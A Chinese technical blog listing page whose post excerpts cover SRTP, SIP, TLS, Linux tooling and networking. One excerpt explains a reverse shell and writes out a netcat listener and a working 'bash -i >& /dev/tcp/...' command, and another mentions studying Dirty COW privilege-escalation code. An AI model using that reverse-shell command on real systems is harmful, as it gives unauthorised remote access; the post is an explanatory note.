- 博客(221)
- 资源 (6)
- 收藏
- 关注
RSS订阅原创 SRTP RFC 3711
目录1 SRTP session key1 SRTP session keyset key_derivation_rate = 0r = index/key_derivation_rate;if key_derivation_rate==0, r=0key_id = <label> || r;key_id = labelx = key_id XOR master salt;Key = PRF (key_id, x);其中,<label>根.
2022-01-25 15:12:24
1538
原创 centos 挂载磁盘并做磁盘加密
a) parted /dev/sdb // 选择要分区的磁盘 b) print // 磁盘信息查看 c) mklabel gpt // 创建磁盘分区表支持GPT d) mkpart primary 0% 100% e) print f) ...
2021-11-12 11:58:58
1312
原创 sr_iov kvm 网卡passthrough
#!/bin/bashtrap "" hupinterface_name=$1function analysis_nodedev_xml(){ local pci_name=$1; local target_line="" virsh nodedev-dumpxml ${pci_name} > ./${pci_name} local start_line=$(grep -rn "<iommuGroup" ./${pci_name} | awk -F...
2021-05-21 17:35:53
208
原创 ansible shiyong
ansible-playbook -i ./hosts -e @var.json deployment_abc.yml
2021-05-14 17:27:20
84
原创 openssl 计算sha256
echo -n eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJwYnh3ZWIiLCJleHAiOjE1OTg5NTc2NTEsImlhdCI6MTU5ODk1NzY0MSwiaXNzIjoicGJ4 | openssl sha -sha256 -binary -hmac key12345678 | base64
2020-09-04 16:53:54
4559
原创 AES GCM 算法
AES-GCM算法是带认证和加密的算法,也即同时可以对给定的原文,生成加密数据和认证码。加密方:plain_testkey_128/key_256iv/salt密文 = f(plain_test, key, iv)mask = f(密文, key)解密方:共享key解密方在得到密文的时候也同时得到iv原文=f(key, iv, 密文)mask' = f(key, 密文)mask' == mask ?...
2020-07-28 16:20:59
1316
原创 docker 创建
1 docker image docker login abcd.com:port (user/pwd) docker pull abcd.com:port/1234/sasasasa2 docker container 创建 docker create --hostname=docker_123_1 --name=docker_123_1--log-driver=syslog --network=host --privileged --restart=on-failur...
2020-07-10 09:22:49
143
原创 sipp basiccall xml script
1 <?xml version="1.0" encoding="ISO-8859-1" ?> 2 <!DOCTYPE scenario SYSTEM "sipp.dtd"> 3 4 <!-- This program is free software; you can redistribute it and/or --> 5 <!--...
2020-03-04 15:13:38
321
原创 c/c++ 无符号数减法
unsigned int a = 2;unsigned int b = 3;unsigned int c = a- b;printf("%u \r\n", c);4294967295a : 补码 0x00000002b: 补码 0x00000003a-b a补 + b反 + 1 0 0 ... 0 0 0 0 0 0 1 0...
2020-02-11 20:50:53
909
原创 sipp register 脚本
1 <?xml version="1.0" encoding="ISO-8859-1" ?> 2 <!DOCTYPE scenario SYSTEM "sipp.dtd"> 3 <!-- This program is free software; you can redistribute it and/or --> 4 <!-- ...
2020-01-20 14:12:07
550
原创 sipp basic call 脚本
1 <?xml version="1.0" encoding="ISO-8859-1" ?> 2 <!DOCTYPE scenario SYSTEM "sipp.dtd"> 3 4 <!-- This program is free software; you can redistribute it and/or --> 5 <!-...
2020-01-20 10:20:30
551
原创 base64 编码
源码序列base64序列源码序列3个字符一组, 3*8 = 24base64 序列, 4*6也即3个源码字符编为4个字符规则为依次取源码字节的bit序列的6个bit, 作为低6位, 高2位补0组成一个新的字节,这个字节用一个可打印字符表示比如新字节的大小为32, 那么新字节对应的可打印字符就是base64table[32]base64_table="AB...
2020-01-09 16:24:12
9639
原创 SIG_STOP waitpid
学习了脏牛漏洞的提权代码:子进程 被 SIG_STOP 后,他的状态变化,可以被父进程使用waitpid 捕获。( kill(getpid(), SIGSTOP);)如在在子进程里面又创建了线程, 那么子进程的这个主线程SIG_STOP后, 并不能使得子线程STOP。如果子进程一直处于STOP状态,没有被CONTINUE, 那么如果如进程退出了, 那么这个子进程会被唤醒的。...
2020-01-07 15:13:44
358
原创 linux SIGCHLD SIG_IGN
一个进程使用fork创建子进程,如果子进程退出,而父进程并没有调用 wait 或 waitpid获取子进程的状态信息,那么子进程的进程描述符仍然保存在系统中。这种进程称之为僵尸进程。子进程在退出时候会给父进程发送SIGCHLD 信号,1)父进程要不然会一直等待wait() ,等待子进程退出,回收资源,2) 要不父进程会异步执行其他任务, 在收到SIGCHLD 信号时候,...
2020-01-07 10:42:21
1084
原创 linux glibc malloc_trim(0)
在项目中发现进程的内存持续上升。首先确定这是不是一个内存泄露,1) gcc 的链接选项-Wl,--wrap,malloc -Wl,--wrap,free -Wl,--wrap,calloc -Wl,--wrap,realloc -Wl,--wrap,strdup -Wl,--wrap,strndup -Wl,--wrap,vasprintf 使用自己的内存池重写内存分配函数...
2020-01-03 16:24:06
6221
原创 linux /var/log/secure 安全日志
/var/log/secure 一般用来记录安全相关的信息,记录最多的是哪些用户登录服务器的相关日志,如果该文件很大,说明有人在破解你的 root 密码很多linux的新发行版已经不再使用,改为使用rsyslog。查看rsyslog的配置目录/etc/rsyslog.d...
2020-01-03 12:22:21
7411
原创 linux fork clone
fork调用的一个奇妙之处就是它仅仅被调用一次,却能够返回两次,它可能有三种不同的返回值: 1)在父进程中,fork返回新创建子进程的进程ID; 2)在子进程中,fork返回0; 3)如果出现错误,fork返回一个负值;fork()调用除了会复制父进程的所有已打开文件描述符, 还会复制父进程的缓存到子进程中.终端stdout是行缓存的普通文件的缓存是...
2020-01-02 11:07:40
132
原创 linux stat
#include <sys/stat.h>int stat(const char *file_name, struct stat *buf);通过文件名filename获取文件信息,并保存在buf所指的结构体stat中返回值: 执行成功则返回0,失败返回-1,错误代码存于errnostruct stat {dev_t st_dev; //文件的设备编号i...
2020-01-02 11:07:20
159
1
原创 linux ptrace
#include <sys/ptrace.h>long ptrace(enum _ptrace_request request,pid_t pid,void * addr ,void *data);ptrace()系统调用函数提供了一个进程(the “tracer”)监察和控制另一个进程(the “tracee”)的方法。并且可以检查和改变“tracee”进程的内存和寄存...
2020-01-02 11:06:44
233
原创 tcpdump
linux 普通用户默认是没有权限使用tcpdump的,所以需要root 用户赋权:root# setcap cap_net_raw=eip /usr/sbin/tcpdump不要为普通用户添加tcpdump的sudo权限,zhangsan ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/less /tmp/abc.text, /us...
2019-12-30 14:04:08
1178
原创 反向 shell
nc -p 4444 -lvv监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14bash -i : bash的交互模式当>&后面接文件时,表示将标准输...
2019-12-27 10:54:47
627
原创 linux 定时任务
cron有两个配置文件,一个是一个全局配置文件(/etc/crontab),是针对系统任务的;一组是crontab命令生成的配置文件(/var/spool/cron下的文件),是针对某个用户的.定时任务配置到任意一个中都可以。查看用户下的定时任务:example:cat /var/spool/cron/root实例1:每1分钟执行一次command 命令:***...
2019-12-25 11:22:55
145
原创 linux ping 与traceroute
ping -s 1600 -M do 10.100.125.15ip 包大小为1600, 在IP层不要分片,这样的话,中间某一个节点MTU < 1600 的话,就会ping不通.-M do 不允许分片-M want: 包大时候就分片-M donttraceroute 跟踪路由...
2019-12-23 09:04:08
487
原创 sipp uas 脚本
<?xml version="1.0" encoding="ISO-8859-1" ?><!DOCTYPE scenario SYSTEM "sipp.dtd"><!-- This program is free software; you can redistribute it and/or --><!-- modify it unde...
2019-12-19 14:45:20
758
原创 软 中断 Irqbalance
ethtool --show-ntuple em2 rx-flow-hash udp4 UDP over IPV4 flows use these fields for computing Hash flow key: IP SA IP DA Irqbalance 在均衡软中断时候,并不会将UDP的端口号作为计算哈希值的参数,所以我们的测试环境中是使用一台...
2019-12-19 08:51:52
715
原创 gdb coredump 分析堆栈
1)对linux 环境做配置,当有异常生成coredump时候,指定coredump的命名格式和路径 ulimit -S -c unlimited >/dev/null 2>&1 echo '/tmp/core_%e.%p' > /proc/sys/kernel/core_pattern ulimit -c unlimited2)定位...
2019-12-16 13:15:02
877
原创 linux 弱网环境模拟
linux 环境,1)tc qdisc adddev eth0 root netem delay 100ms 10ms 将eth0网卡的传输设置为延迟100ms ± 10ms(90 ~ 110 ms之间的任意值)发送, 所有的包2)tc qdisc adddev eth0 root netem delay 100ms 10ms 10% ...
2019-12-11 15:10:45
1644
原创 SRTP RFC4568
在传统电话业务中 SIP 信令 以及语音数据,在传输层大都使用UDP,随着电话业务的运营由运营商(移动,电信,联通)扩展到公司,到如今的云电话服务。 被服务的公司或个人越来越注重数据的安全,可选择的运营公司比较多,导致各个运营商开始实施安全的SIP 信令和语音。SIP/TLS or sipsVoice / SRTPRFC 4568 就描述了怎么在SDP中协商 媒体加密参数。因为S...
2019-12-06 16:35:53
783
转载 Linux网络流量控制工具—Netem
第一篇:概念篇Netem是Linux 2.6及以上内核版本提供的一个网络模拟功能模块。该功能模块可以用来在性能良好的局域网中,模拟出复杂的互联网传输性能,诸如低带宽、传输延迟、丢包等等情况。使用Linux 2.6(或以上)版本内核的很多发行版Linux都开启了该内核功能,比如Fedora、Ubuntu、Redhat、OpenSuse、CentOS、Debian...
2019-12-06 16:09:47
1204
原创 Nginx tcp 反向代理安装配置
1)yum -y install gcc zlib zlib-devel pcre-devel openssl openssl-devel2)cd /usr/local/nginx3) wget http://nginx.org/download/nginx-1.17.5.tar.gz4) 编译 nginx ./configure --with-stream -...
2019-11-29 16:23:26
512
原创 VLAN
在上一篇中, 我们熟悉了二层交换机以及ARP。从中我们可以了解到,二层交换机下面所连接的host 都是在一个广播域内的。也就是一个端口连接的host 发送一个广播包到二层交换机上, 交换机会将这个包广播到除他之外的所有的端口。这样看来,这个广播的量就会比较大,对应的控制起来就不方便。尤其是当二层交换机之间互相连接的时候,这个广播量就更大了。(多个二层交换机相连,可以简单看做一个更多网...
2019-11-28 15:10:04
213
原创 ARP 与 二层交换机
二层交换机:交换机始终依靠着收到的包的MAC地址进行转发。那他就必须要有一个MAC地址与自己端口的映射关系。这个映射关系是通过学习知道的。比如 一台二层交换机有很多口,其中有4个口分别连着A B C D.以最常见的是ARP请求为例。A 广播 ARP 请求, 查询D的MAC地址, ARP 请求发送到 交换机后,交换机就知道了A的MAC地址,也就建立了MAC地址与端口的映...
2019-11-27 13:23:12
2339
原创 TLS 握手 与证书认证
1) TLS 握手 握手的目的就是协商出一个对称加密使用的key,用来加密后面的业务数据。 1) client 产生一个random 值 2) server 产生一个random 值, server 将签名的证书 和 random 值 以及非对称加密使用的public key 发送给client 3) client 验证证书,再产生...
2019-11-18 18:05:56
1160
原创 SIP 鉴权 & HTTP 认证
sip 鉴权是基于摘要签名认证的,具体来说:每一个用户都有一个用户名和密码,用户名和密码在客户端和SIP 服务器的数据库中都有保存。在认证的过程中, 客户端将自己的信息(用户名 密码 url 等信息) 做一些复杂的MD5 或者SHA256/SHA512 签名,这个签名给SIP server, SIP server 也会用相同的信息计算签名, 结果一样就认为发送消息的用户是真正合法的用户。...
2019-11-15 14:06:11
1884
原创 SIP DTMF
SIP DTMF 有三种方式1) 带外方式, 也就是指传DTMF信号不走RTP, 通过信令的方式。用的比较多的是 sip INFO消息传输。2) 带内方式 a) 直接把DTMF 信息当做语音信号处理,但是他和语音的频率不同,在接收端可以根据频率把这16个电话按键区分出来。 但是不是所有的Codec都能够携带DTMF, G729 好像就不可以携带DTM...
2019-08-05 10:55:49
1774
原创 TLS
http://www.mamicode.com/info-detail-1846390.html对称加密:在对称加密中,数据发送方将明文(原始数据)和加密密钥一起经过特殊加密算法处理后,使其变成复杂的加密密文发送出去。接收方收到密文后,若想解读原文,则需要使用加密密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明文。在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数...
2018-11-29 11:06:45
492
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人